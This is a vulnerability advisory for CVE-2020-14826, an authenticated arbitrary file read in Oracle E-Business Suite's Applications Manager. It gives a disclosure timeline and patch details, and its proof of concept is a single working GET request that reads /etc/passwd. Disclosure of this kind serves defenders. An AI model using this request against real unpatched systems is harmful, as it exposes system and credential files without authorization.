DESCRIPTION
Oracle E-Business Suite supports today’s evolving business models, drives productivity, and meets the demands of the modern mobile user.
More information at https://www.oracle.com/applications/ebusiness/.
SUMMARY
| PRODUCT | Oracle E-Business Suite |
|---|---|
| VENDOR | Oracle |
| AFFECTED VERSIONS | 12.2.5, 12.2.6 |
| SEVERITY | MEDIUM |
| IDENTIFIER | CVE-2020-14826 |
| TESTED PLATFORM | Linux |
IMPACT
Arbitrary File Reading under oracle's privileged.
DETAILS
Vulnerability in the Oracle Applications Manager product of Oracle E-Business Suite.
After login as SYSADMIN, attacker is able to read arbitrary files by accessing vulnerable endpoint
`http:///OA_HTML/weboam/oam/adconfig/adAppsCtxtFilesTable$target=$fnctNm=NODE*_CONFIG.EDIT*_PORTS$event=doFilter?event=viewFile&fileName=` with `filename` is local file name which can be read under oracle's privileged.
PROOF OF CONCEPT
Download `/etc/passwd`by GET this url
`http:///OA_HTML/weboam/oam/adconfig/adAppsCtxtFilesTable$target=$fnctNm=NODE*_CONFIG.EDIT*_PORTS$event=doFilter?event=viewFile&fileName=/etc/passwd`
VENDOR STATUS
Oracle released critical patch update advisory - October 2020 https://www.oracle.com/security-alerts/cpuoct2020.html.
CREDIT
Thai Nguyen
DISCLOSURE TIMELINE
| Date | Sumary |
|---|---|
| 20/03/2020 | Vulnerability discovered |
| 19/05/2020 | ECQ sent the advisory to Oracle |
| 19/05/2020 | Oracle Security Alerts received report and will investigate |
| 21/05/2020 | Oracle Security Alerts confirmed issue and filed a security bug to track |
| 16/08/2020 | ECQ requested a status update and informed 90 days disclosure policy |
| 19/08/2020 | Oracle Security Alerts informed that they filed against the wrong product and scheduled to released patch on October 20, 2020 |
| 17/10/2020 | Oracle Security Alerts assigned CVE and informed Critical Patch Update will be released on October 20, 2020 |
| 20/10/2020 | Oracle released Critical Patch Update |
| 17/05/2021 | Advisory Published |
APPENDIX
N/A